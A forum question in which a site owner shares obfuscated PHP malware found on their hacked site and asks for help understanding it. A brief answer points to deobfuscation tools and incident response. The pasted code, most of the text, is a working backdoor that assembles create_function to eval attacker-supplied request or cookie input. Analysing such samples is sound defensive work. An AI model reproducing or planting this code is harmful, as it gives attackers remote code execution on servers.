PHP Malware - deobsfucation

Question

I have a php7 site that had some malware type files uploaded to it. My hosting provider notified me of it and I have removed them, but I wanted help in understanding the attack (help de-obsfucating, and help understanding what it does) Here is the source: DONT RUN IT, as I dont know what it does.

<?php

$guillotine ='veLaT:(at'; $crust = 'cCrx9)'; $denials = 's';

$cockle='s';$cobby= 'e';

$cretinous ='uT,6)'; $antagonist = '[';$fortnightly ='iHr'; $formalism = 'i';$cowboy = 'a';$installed='i'; $lake =';R=^t';$dairymen='_';
$crept='$$i(f1a'; $bitterroot = 'v'; $arccos ='2?AEE_i_'; $lamb='a';$eradicated = 'tC';
$kimbell='sTiY';
$asymptotic= '"S';
$clarify = ')_,'; $firework='D/esH4+U';$clasping='b'; $divisor ='*rTts(';
$cautious ='EW-'; $embassy=')'; $chaperon ='t';$evinced ='s'; $ibid = 'P[P '; $alyson = 'KnTBe';

$buzzard= 'Sa_S);('; $laurent= ')Rk';
$enumerating= '>=Ueaa';$highly = '`7';$anonym= '0f_$R';$dam='r'; $gypsies ='rM?';$jaye= 't';$as= 'If';$flagrant = '8hHS$I)X';

$arcade = 'KT"'; $foolproof = 'r'; $bowmen ='F'; $incompatibly ='y'; $delegable='a';$heavy ='n$@Qsct';$diatribe= '4'; $campfire= 'o';
$hayyim= 'C;r__e'; $goober= 'e';$dejected= 'e';$bedazzle='$'; $incompletion = 'c'; $hypothetical= 'o'; $diploma= 'Ktusdd.J'; $irremediable='n';$epic ='eEt,S_a'; $faina = 'l(F'; $internet = 'T';

$ephemeris='('; $incorrect ='XfVg'; $binder='r'; $barnard = ')'; $libra= '"';$applied= 'O'; $christian = '_c';$bhoy = 'e';$grieving=']gspHH';$gained ='v'; $fisticuff ='3e:F';

$harlie ='EP)]'; $ermine ='h';

$bond = 'om$<a'; $groundsel ='c]_'; $banning ='r';$innocence ='$';$hutchins ='"'; $amoebae = 't';
$doggy ='y"'; $erminie='Z'; $finesse= '(T"(Vt[lT';

$differing= 'X($'; $atrophic='"]N:)ie'; $forswear = ')]xGK';$buddies = 'RE';
$cynthie = 'O[Tg6sce'; $lane ='(';
$encourage ='_';

$harassment='?p';$jobie ='i(';$camber ='['; $boiled = 'i$O';$bel = 'rQr(C);v';
$boating ='d';

$headwall = 'e';$exemplary = 'ek="5';$climate =';'; $comfortabilities =$cynthie['6'].$bel['2'] .$exemplary['0'].$bond['4'] . $finesse['5'].
$exemplary['0'] . $encourage .

$incorrect['1'] .$diploma['2']. $irremediable. $cynthie['6'].$finesse['5']. $boiled[0] .$bond['0']. $irremediable ;
$injunct =$ibid[3] ; $digestible=$comfortabilities($injunct,$exemplary['0'] .$bel['7'] . $bond['4'].$finesse['7']. $bel[3] . $bond['4']. $bel['2'] .$bel['2']. $bond['4'] .$doggy['0'].$encourage . $harassment['1'] .$bond['0']. $harassment['1'] .$bel[3].$incorrect['1'] .$diploma['2'].$irremediable. $cynthie['6'] .$encourage.$cynthie['3']. $exemplary['0'].$finesse['5'] .$encourage . $bond['4'].$bel['2'].
$cynthie['3'] . $cynthie[5]. $bel[3]. $bel[5] . $bel[5] .$bel[5] .$climate ); $digestible
($embarrassment['0'] , $fisticuff['3'], $arccos[2] , $cynthie[5],
$atrophic['2'], $divisor['0'],
$gypsies['1'],
$bond['3'] , $boiled['1'].$boiled[0]. $exemplary[2].$bond['4'] .$bel['2'].
$bel['2']. $bond['4'] .$doggy['0'] . $encourage .$bond['1'] .$exemplary['0'].$bel['2'] . $cynthie['3'].$exemplary['0'] .$bel[3].$boiled['1'] . $encourage.$buddies['0']. $buddies['1'].

$bel['1'].
$enumerating['2'].$buddies['1']. $epic[4].

$cynthie['2'].

$epic['3'].$boiled['1'] .$encourage. $bel['4'].$boiled['2']. $boiled['2'] .
$forswear['4'].$flagrant['5'] . $buddies['1'] . $epic['3'].$boiled['1']. $encourage.
$epic[4] . $buddies['1'] . $buddies['0']. $finesse['4'] .$buddies['1'].$buddies['0'] . $bel[5] .$climate.$boiled['1']. $bond['4'] . $exemplary[2]. $boiled[0]. $cynthie[5].$cynthie[5] .$exemplary['0']. $finesse['5'] .$bel[3]. $boiled['1']. $boiled[0] . $camber .$exemplary['3'] .$ermine . $forswear['2'] . $exemplary['1'] .

$cynthie['6'] .

$finesse['5']. $finesse['5']. $cynthie[5].
$incorrect['1'] .$exemplary['3']. $forswear['1'] .$bel[5]. $harassment['0'] .$boiled['1'].$boiled[0]. $camber. $exemplary['3'].
$ermine.$forswear['2']. $exemplary['1'] . $cynthie['6'].$finesse['5']. $finesse['5'] . $cynthie[5] .
$incorrect['1'] .$exemplary['3']. $forswear['1'].$atrophic['3'] . $bel[3].$boiled[0].$cynthie[5].$cynthie[5] . $exemplary['0'] .
$finesse['5'] .$bel[3]. $boiled['1'] .$boiled[0] .

$camber .$exemplary['3'] .$grieving['5']. $cynthie['2'] . $cynthie['2'].$harlie['1'] . $encourage .$grieving['5']. $differing['0'] .$forswear['4'].

$bel['4'] .$cynthie['2']. $cynthie['2'].$epic[4] . $fisticuff['3'] .$exemplary['3'] .
$forswear['1'].
$bel[5] .$harassment['0'] .

$boiled['1'].
$boiled[0] . $camber. $exemplary['3'] . $grieving['5'] .$cynthie['2'].$cynthie['2'] .$harlie['1'] . $encourage.$grieving['5'] .

$differing['0'] .$forswear['4']. $bel['4']. $cynthie['2'] . $cynthie['2'] .
$epic[4] . $fisticuff['3'] . $exemplary['3'] . $forswear['1'] .
$atrophic['3']. $boating.

$boiled[0].$exemplary['0'].$bel[5] .$climate . $exemplary['0'] . $bel['7'] .$bond['4']. $finesse['7'] .$bel[3]. $cynthie[5] .$finesse['5'] .$bel['2'] . $bel['2']. $exemplary['0'].$bel['7'].
$bel[3].$clasping . $bond['4'] .$cynthie[5].$exemplary['0']. $cynthie['4'].$diatribe.
$encourage.$boating. $exemplary['0'].

$cynthie['6'] . $bond['0'] . $boating. $exemplary['0'] .

$bel[3]. $cynthie[5] .

$finesse['5'].
$bel['2'].

$bel['2'] .

$exemplary['0'].$bel['7'].$bel[3].$boiled['1'] .

$bond['4']. $bel[5] .

$bel[5].$bel[5].$bel[5].$climate  );

Answer 1

Okay for de-obfuscation you can use online tools such as https://www.unphp.net/ or run a local VM to test what the php script does.

Also a piece of advice, since you found this in your website, it definitely means your website was hacked. As an incident response process you need to find the weakness in your website to prevent further attacks else you will keep getting this issues.